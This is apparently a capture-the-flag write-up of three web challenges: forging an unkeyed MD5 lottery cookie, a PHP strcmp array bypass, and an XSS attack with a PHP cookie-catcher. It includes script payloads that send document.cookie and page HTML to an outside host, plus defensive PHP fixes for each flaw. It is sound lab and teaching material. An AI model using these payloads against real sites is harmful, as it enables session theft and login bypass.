We found this web site http://enei-x.dei.uc.pt/webhack3/ that is claiming to offer a prize when someone rolls the right number, but it's all a scam. Can you break the system to win the prize?!
The page looks like this:
The cookie changes when the page is refreshed, using a new browser session. In this session, my cookie was lotinfo="706:MjlmMjI5OWNhNGIyNmZiZjQyYzIzZWU0N2M0MDExMjU=". The second part of lotinfo seems to be a base64 encoded string.
$ printf '%s' MjlmMjI5OWNhNGIyNmZiZjQyYzIzZWU0N2M0MDExMjU= | base64 -d
29f2299ca4b26fbf42c23ee47c401125
Now we have a 32-hex-digit value, which looks like a message digest. Let's hash the ticket with MD5 and compare.
$ printf '%s' 1337810218 | md5
29F2299CA4B26FBF42C23EE47C401125
Nice! Now we know that cookie = random_ID:base64(md5(ticket)). Since our goal is to win the lottery, all we need to do is change the session cookie, using the winning ticket.
$ printf '%s' 1337500001 | md5
D50796F06CB23BE1A80284F80EAC0C2D
$ printf '%s' d50796f06cb23be1a80284f80eac0c2d | base64
ZDUwNzk2ZjA2Y2IyM2JlMWE4MDI4NGY4MGVhYzBjMmQ=
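The root cause is that nothing in random_ID:base64(md5(ticket)) is secret: the hash is unkeyed, so any client that knows the format can produce a valid cookie for any ticket. As an added example (not the challenge's own server code, which the page does not show), here is a PHP sketch of that weak scheme beside a keyed version in which the server signs the ticket with a secret it never sends to the client. The function names and SERVER_SECRET are assumptions; the session id 706 and the ticket values are the ones from the page.

```php
<?php
// Added example, not the challenge's code. Function names and the secret are assumptions.

// The scheme inferred on the page: random_ID:base64(md5(ticket)).
// Nothing in it is secret, so any client can compute a valid cookie for any ticket.
function make_cookie_weak(int $sessionId, string $ticket): string
{
    return $sessionId . ':' . base64_encode(md5($ticket));
}

// Keyed replacement: an HMAC-SHA256 tag over session id and ticket, using a
// server-only secret. The client sees the tag but cannot recompute it.
const SERVER_SECRET = 'assumed-placeholder-replace-with-a-long-random-server-side-value';

function make_cookie_hmac(int $sessionId, string $ticket, string $secret = SERVER_SECRET): string
{
    $tag = hash_hmac('sha256', $sessionId . ':' . $ticket, $secret);
    return $sessionId . ':' . $ticket . ':' . base64_encode($tag);
}

// Returns the ticket if the cookie is authentic, null otherwise.
function verify_cookie_hmac(string $cookie, string $secret = SERVER_SECRET): ?string
{
    $parts = explode(':', $cookie);
    if (count($parts) !== 3) {
        return null;
    }
    [$sessionId, $ticket, $b64tag] = $parts;
    $expected = hash_hmac('sha256', $sessionId . ':' . $ticket, $secret);
    $given = base64_decode($b64tag, true);
    // hash_equals() compares in constant time, so the check leaks no timing information.
    if ($given === false || !hash_equals($expected, $given)) {
        return null;
    }
    return $ticket;
}

// Demo with the values from the page.
echo make_cookie_weak(706, '1337810218'), "\n";   // the cookie format seen in the browser

$good = make_cookie_hmac(706, '1337810218');
var_dump(verify_cookie_hmac($good));              // accepted: returns the ticket

// A client that swaps in another ticket without the server secret is rejected.
$forged = '706:1337500001:' . base64_encode(hash_hmac('sha256', '706:1337500001', 'guess'));
var_dump(verify_cookie_hmac($forged));            // rejected: returns null
```

The server should also record which ticket it actually issued to session 706 and check the submitted ticket against that record; the HMAC only proves the cookie was minted by the server, not that the ticket is the one the session was given.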
A friend has a service online and he says that he will never get hacked with his new bulletproof authentication mechanism. Can you prove him wrong?
This was the login page (it's not working since I'm not running PHP):
When we submit the form, a new message shows up:
Let's search for strcmp vulnerabilities. The strcmp(string $str1, string $str2) function returns 0 if $str1 and $str2 are equal. When we pass an array instead of a string in the GET password parameter, strcmp emits a warning and returns NULL rather than 0, and under loose comparison NULL == 0 is true, so the check is bypassed:
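As an added illustration (not the challenge's source, which the page does not show), the vulnerable comparison beside a fixed one. The secret value and the function names are assumptions; a real login would compare against a stored password hash rather than a literal, but the type check and strict comparison are the point here.

```php
<?php
// Added example, not the challenge's source. The secret and function names are assumptions.
$secret = 'assumed-placeholder-secret';

// Vulnerable: on PHP 5 and 7, strcmp() given an array emits a warning and returns NULL,
// and NULL == 0 is true under loose comparison, so ?password[]=x is accepted.
// (PHP 8 throws a TypeError instead, which ends the request with an error.)
function check_loose($input, string $secret): bool
{
    return strcmp($input, $secret) == 0;
}

// Fixed: refuse anything that is not a string, then compare with hash_equals(),
// which returns a strict bool and runs in constant time.
function check_strict($input, string $secret): bool
{
    if (!is_string($input)) {
        return false;
    }
    return hash_equals($secret, $input);
}

// Demo over three inputs: an array (the bypass shape), a wrong string, the right string.
// In a real handler $input would be $_GET['password'] ?? null.
foreach ([['x'], 'wrong', $secret] as $input) {
    try {
        $loose = check_loose($input, $secret) ? 'accepted' : 'rejected';
    } catch (TypeError $e) {
        $loose = 'TypeError (PHP 8)';
    }
    $strict = check_strict($input, $secret) ? 'accepted' : 'rejected';
    printf("%-12s loose=%s strict=%s\n", json_encode($input), $loose, $strict);
}
```

On PHP 7 the first line of the demo shows the array accepted by the loose check and rejected by the strict one; the warning strcmp prints is itself a useful detection signal in the PHP error log, since legitimate logins never send a password array.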
By analyzing some hack attempts in our HTTP logs we found a few scripts and those led us to an admin interface from our friend hacker. Can you get us inside?
This was the login page (it's not working since I'm not running the backend):
When we try to login using a random username and password the following message appears:
"An admin will track you by your IP"
Interesting... Let's try to steal some cookies! We need to set up a page to catch the cookie. I'm going to use PHP:
<?php
// Receiver: append whatever arrives in ?data= to log.txt
$data = $_GET['data'];
$f = fopen("log.txt", "a");
fwrite($f, $data . "\n");
fclose($f);
?>
Let's inject a script in the username:
<script>document.location("http://my-php-host/catch.php?data=" + document.cookie);</script>
Suddenly, this hint pops up:
Let's try to get the document HTML:
<script>document.location("http://my-php-host/catch.php?data=" + document.documentElement.innerHTML);</script>
It worked!
<head></head><body><p>remember to set your cookie "token": 2272d26a38bc90570d633e7b3508c67a </p><table class="table"><thead><tr><th>IP Address</th><th>Username</th><th>Password</th></tr></thead><tbody><tr><td>192.168.2.10</td><td>Xiene1337</td><td>185de54b5a6fd960f48666edfa41e6c6</td></tr><tr><td>192.168.2.12</td><td>Xiene1337</td><td>707d14da58ce62c08bba543fa62fe638</td></tr><tr><td>192.168.2.12</td><td>Xiene1337</td><td>74dade10c776b5ab3caf8cedb06860fb</td></tr><tr><td>127.0.0.1</td><td>script>document.location("http://my-php-host/catch.php?data=" + document.documentElement.innerHTML);</script></td></tr></tbody></table></body>
This HTML code looks like this:
remember to set your cookie "token": 2272d26a38bc90570d633e7b3508c67a
If we try to login using the username Xiene1337 and setting
document.cookie="token=2272d26a38bc90570d633e7b3508c67a" a new message appears:
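Two defects in the admin page made this work: the username from the login log is written into the HTML without escaping, and the token is both readable from document.cookie and printed into the page body (so even an HttpOnly cookie would have leaked through the innerHTML dump). As an added example (not the challenge's admin page), here is how that table would be rendered safely in PHP. The rows are constructed sample data; the token value is the one the page shows; the helper name h() is an assumption.

```php
<?php
// Added example, not the challenge's code. Rows are constructed; h() is an assumed helper name.

// Constructed sample rows, including a username that carries markup.
$rows = [
    ['ip' => '192.168.2.10', 'user' => 'Xiene1337', 'pass' => '185de54b5a6fd960f48666edfa41e6c6'],
    ['ip' => '127.0.0.1',    'user' => '<script>alert("xss")</script>', 'pass' => ''],
];

// Escape for HTML text and attribute contexts; ENT_QUOTES also covers single quotes.
function h(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Token cookie: HttpOnly keeps document.cookie from exposing it to injected script,
// Secure limits it to HTTPS, SameSite limits cross-site sends. Must run before any output.
// The token is never echoed into the page body.
setcookie('token', '2272d26a38bc90570d633e7b3508c67a', [
    'httponly' => true,
    'secure'   => true,
    'samesite' => 'Strict',
]);

echo "<table class=\"table\"><thead><tr><th>IP Address</th><th>Username</th><th>Password</th></tr></thead><tbody>\n";
foreach ($rows as $r) {
    // Every cell goes through h(), so the second row renders as literal text, not a script.
    printf("<tr><td>%s</td><td>%s</td><td>%s</td></tr>\n", h($r['ip']), h($r['user']), h($r['pass']));
}
echo "</tbody></table>\n";
```

A Content-Security-Policy header that disallows inline script would have blocked the injected script even if escaping were missed, and a log line for each failed login whose username contains < or > is a cheap detection for attempts of this kind.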
The passwords in the log table may be MD5 hashes. Let's try to find them in MD5 databases.
| MD5 Hash | Original password |
These passwords were mistyped by Xiene1337, since they are very similar. To find the correct password, just look at your keyboard! The correct password is ljbo.
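The reason the log's values could be looked up at all is that they are bare MD5 digests: unsalted, fast to compute, and identical for every user with the same password, which is exactly what MD5 databases index. As an added example (not the challenge's code), the contrast with PHP's password_hash(), which salts per user and uses a slow algorithm so precomputed tables do not apply. The password ljbo is the one named on the page; the verify() name is an assumption.

```php
<?php
// Added example, not the challenge's code. verify() is an assumed name.
$password = 'ljbo'; // the recovered password named on the page

// Unsalted MD5: deterministic and fast, so a lookup database maps it straight back
// to the plaintext, and typo variants of one password sit next to each other in the log.
$weak = md5($password);

// password_hash() draws a random salt per call and uses a slow algorithm
// (bcrypt by default), so two users with the same password get different hashes
// and a precomputed table is useless.
$strong = password_hash($password, PASSWORD_DEFAULT);

function verify(string $candidate, string $stored): bool
{
    return password_verify($candidate, $stored);
}

var_dump(verify('ljbo', $strong));                                 // accepted
var_dump(verify('ljbp', $strong));                                 // rejected
var_dump($weak === md5('ljbo'));                                   // equal: deterministic, which is the problem
var_dump(password_hash($password, PASSWORD_DEFAULT) === $strong);  // differs: fresh salt on every call
```

Storing the hash of a failed login attempt in a log, as this admin page did, is a separate mistake: failed attempts are usually near-misses of the real password, so the log leaks almost as much as the credential store itself.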